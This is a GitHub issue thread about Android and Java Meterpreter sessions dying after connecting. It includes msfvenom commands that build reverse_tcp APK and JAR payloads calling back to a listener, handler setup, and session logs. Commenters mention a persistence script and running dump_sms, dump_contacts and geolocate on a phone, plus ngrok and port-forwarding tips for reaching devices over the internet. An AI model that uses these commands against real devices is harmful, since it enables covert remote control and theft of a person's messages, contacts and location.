rapid7 / meterpreter

THIS REPO IS OBSOLETE. USE https://github.com/rapid7/metasploit-payloads INSTEAD
Other
328 stars 144 forks source link

Android meterpreter crashes (Android L 5.0.1) #179

Closed comertcimen closed 6 years ago

comertcimen commented 9 years ago

To reproduce: (1) Generate a .apk file for Android Meterpreter

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=4444 R > Android.apk

(2) Create a handler for Android Meterpreter (on Armitage)

msf > use exploit/multi/handler msf exploit(handler) > set LHOST 192.168.1.12 LHOST => 192.168.1.12 msf exploit(handler) > set DisablePayloadHandler false DisablePayloadHandler => false msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp PAYLOAD => android/meterpreter/reversetcp msf exploit(handler) > set TARGET 0 TARGET => 0 msf exploit(handler) > set ExitOnSession false ExitOnSession => false msf exploit(handler) > exploit -j [] Exploit running as background job. [] Started reverse handler on 192.168.1.12:4444 [] Starting the payload handler... [] Sending stage (50643 bytes) to 78.162.55.92 [] 78.162.55.92 - Meterpreter session 1 closed. Reason: Died [] Meterpreter session 1 opened (127.0.0.1 -> 78.162.55.92:51289) at 2015-07-23 22:12:51 +0300 [-] Meterpreter session 1 is not valid and will be closed [] Sending stage (50643 bytes) to 78.162.55.92 [] Meterpreter session 2 opened (192.168.1.12:4444 -> 78.162.55.92:38172) at 2015-07-23 22:12:55 +0300 [] 78.162.55.92 - Meterpreter session 2 closed. Reason: Died [] Sending stage (50643 bytes) to 78.162.55.92 [] Meterpreter session 3 opened (192.168.1.12:4444 -> 78.162.55.92:36417) at 2015-07-23 22:13:21 +0300 [] 78.162.55.92 - Meterpreter session 3 closed. Reason: Died [] Sending stage (50643 bytes) to 78.162.55.92 [] Meterpreter session 4 opened (192.168.1.12:4444 -> 78.162.55.92:52956) at 2015-07-23 22:17:07 +0300 [] Sending stage (50643 bytes) to 78.162.55.92 [] Meterpreter session 5 opened (192.168.1.12:4444 -> 78.162.55.92:48955) at 2015-07-23 22:17:09 +0300 [] Sending stage (50643 bytes) to 78.162.55.92 [] Meterpreter session 6 opened (192.168.1.12:4444 -> 78.162.55.92:44943) at 2015-07-23 22:17:10 +0300 [] Sending stage (50643 bytes) to 78.162.55.92 [] Meterpreter session 7 opened (192.168.1.12:4444 -> 78.162.55.92:40981) at 2015-07-23 22:17:11 +0300 [] 78.162.55.92 - Meterpreter session 4 closed. Reason: Died [] 78.162.55.92 - Meterpreter session 5 closed. Reason: Died [] 78.162.55.92 - Meterpreter session 6 closed. Reason: Died [_] 78.162.55.92 - Meterpreter session 7 closed. Reason: Died [-] Failed to load extension: No response was received to the core_enumextcmd request.

So what is the problem?

timwr commented 9 years ago

I can't reproduce this on a 5.0.1 emulator with https://github.com/rapid7/metasploit-framework/commit/50c9293aabb4ca62d2ba80ad3eb9420fe209ce58. Which device/emulator? Could you try set AutoVerifySession false on the handler please? Also could you provide the output from adb logcat? Thanks for reporting! p.s You might want to report this on https://github.com/rapid7/metasploit-framework or https://github.com/rapid7/metasploit-payloads, as this repository is deprecated.

OJ commented 9 years ago

Looks like your binaries are out of date to me. Are you using kali?

comertcimen commented 9 years ago

@timwr I tried on Samsung Galaxy Note 4. I'll try it. @OJ Yes i am using kali.

drikusj commented 9 years ago

Anyone got this to work?

OJ commented 9 years ago

I'm having no issues at all. But I don't have a Galaxy note. It still looks like out of date binaries to me.

bcook-r7 commented 9 years ago

I've been using Android M a lot lately with no issues either.

n3otr3x commented 9 years ago

I use android/meterpreter/reverse_https on samsung galaxy note 4 with android 5, because reverse_tcp crashes and says conection closed. Died

khanfar commented 8 years ago

how to use reverse_https ??? use with set PAYLOAD alone or make it first using msfvenom .apk after that with payload set command ?????

khanfar commented 8 years ago

i try reverse_tcp with my nexus5 phone android 6.01 M and it will got meterpreter session closed !!!! any idea ??????

giovannicolonna commented 8 years ago

@khanfar reverse_https has to be set both with msfvenom .apk (use port 8443) and payload (leave lport as default)

in my case, reverse_https meterpreter session dies after 20/30 sec, and reverse_tcp also dies (but in lucky case is opened for more than a minute). (tried on galaxy s6, lollipop with kali on vmware)

I don't know if app is closed by android os or it crashes (i cannot have a logcat right now), seems that something wrong happens to client-side (on android terminal)

luispani commented 8 years ago

Apparently is when the screen locks

busterb commented 8 years ago

That's not a crash, that's just the phone going to sleep and killing idle applications. The change to convert this to work as a service is in now, you can try it out now if you want to build the latest android meterpreter directly from the master branch of metasploit-payloads.

Harry6363 commented 8 years ago

Got it mine working update SDK accordingly and use exploit -j command to session

0xIslamTaha commented 8 years ago

I'm facing the same issue right now. I'm using metasploit version metasploit v4.13.1-dev-ec020e3d079ad1959418220409995f033ab3d409

session is closed in 10 seconds! I tried it on Andorid L 5.1

ghost commented 7 years ago

I have the same issues. I have built the reverse_tcp meterpreter for android and set up persistent script for it to run the MainActivity every 20 seconds or so. It works across reboots but now on most commands the session dies and it will not re-connect the meterpreter shell until the next reboot.


Session #1 - Dies running dump_sms msf exploit(handler) > [] Sending stage (xxxxx bytes) to x.x.x.x [] Meterpreter session 1 opened (x.x.x.x:443 -> x.x.x.x:random-port) at date-stamp

msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1...

meterpreter > dump_sms

[*] x.x.x.x- Meterpreter session 1 closed. Reason: Died

Session #2 - Dies running wlan_geolocate meterpreter > dump_contacts [-] Error running command dump_contacts: Rex::TimeoutError Operation timed out. meterpreter > geolocate [-] android_geolocate: Operation failed: 1 meterpreter > wlan_geolocate

[*] x.x.x.x- Meterpreter session 2 closed. Reason: Died


Busterb - you mention there is a newer version of the android meterpreter that I can use that may solve this? I am running Kali linux and the latest version of metasploit-framework:Framework Version: 4.14.1-dev. Should I re-instal from the Github or do I have the latest scripts for everything? Any ideas why this would be occuring? It is notable to mention that most commands fail in general - such as I cannot gather audio of more than 20 seconds - and cannot dump calllog, geolocate and most others have an error or fail and cause disconnection.

ghost commented 7 years ago

I just installed new clean install of Debian and installed metasploit-framework from Github and still same issues. The android meterpreter doesn't work for most commands - just crashes when trying any commands like my last post.

rekonx11 commented 7 years ago

same here. but... the session is dying only when the phone (lg g5 ver:6.0.1) connected to the 4g. when the phone connected to the wifi it works just fine. btw i'am use vps (virtual private serve) got few theory's: 1.the internet speed matters (upload and download) 2 the isp (Internet service provider) blocks it

busterb commented 7 years ago

so, could just be a timeout over slow networks.

DuscraperRn commented 7 years ago

As I experienced Reverse_tcp works well on Redmi 2 but not on Samsung Galaxy J5 So it is not a crash. Else working on it...

DuscraperRn commented 7 years ago

@n30tr3x is right using reverse_https solves the problem .

benjholla commented 7 years ago

I am seeing the same problem with java/meterpreter/reverse_tcp payload.

Jar: msfvenom -f raw -p java/meterpreter/reverse_tcp LHOST=172.16.189.167 LPORT=4444 -o ~/Desktop/meterpreter.jar

Handler:

Payload options (java/meterpreter/reverse_tcp):
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST  172.16.189.167   yes       The listen address
LPORT  4444             yes       The listen port

Error messages below:

msf exploit(handler) > run
[*] Started reverse TCP handler on 172.16.189.167:4444 
[*] Starting the payload handler...
[*] Sending stage (49645 bytes) to 172.16.189.158
[*] Meterpreter session 9 opened (172.16.189.167:4444 -> 172.16.189.158:49158) at 2017-09-21 23:31:14 -0400

meterpreter > 
[*] 172.16.189.158 - Meterpreter session 9 closed.  Reason: Died
HsPanda commented 7 years ago

@n3otr3x i am new and not sure how to set up https payload, is it basicly the same as a tcp where i would make the apk and then install it on the device?

MagicianMido32 commented 6 years ago

Try Using Stageless payload
Meterpreter_reverse_https

Mostly it's an issue with the type of the mobile phone you are using Not a Bug in Metasploit

Khaleell commented 6 years ago

[*] Started reverse TCP handler on 0.0.0.0:4444 Error hellp

wi6n3l commented 6 years ago

I babe the same problem, with android/meterpreter/reverse_http, on LAN ir Works,but on WAN ir says meterpreter session 1 opened but dont start meterpreter i cancel the exploit with cntrl+c qnd type sessions 1 qnd open meterpreter, but when i type help just apeears the general comanda, bot android commands... Pls help me

wi6n3l commented 6 years ago

Have*

busterb commented 6 years ago

Don't use LHOST = 0.0.0.0

LHOST is the address that will be embedded into the payload for it to connect to. If you don't have LHOST as a specific, routable address, you will not be able to connect the payload to it.

wi6n3l commented 6 years ago

I uses LHOST = ddns ip

therealist693 commented 6 years ago

First update metasploit to version 4.16.40-dev via github and use free installer to install it then to fix this problem open the folder ngrok is located in and type ./ngrok tcp whatever port your using.

gothmguntur commented 6 years ago

[*] Started reverse TCP handler on 0.0.0.0:4444 Error hellp

I think it's a port forwarding problem, if you use no-ip do not forget update via console, also setting NAT on router on port 4444

ByPassUAC commented 6 years ago

Hi fellow hackers, you might want to stop using Armitage, I know it's much more comfortable but remember, as it has GUI that controls metasploit you are limited to what Armitage offers and not to what metasploit offers, for example I found out that first of all Armitage is much slower, second, when you type the command 'shell' on a meterpreter session on Armitage, It does not work, metasploit Is just soo much better and it might work with metasploit, give it a try. It takes time to get used t metasploit but it is much faster and much more powerful

angelsomar commented 6 years ago

exploit -j -z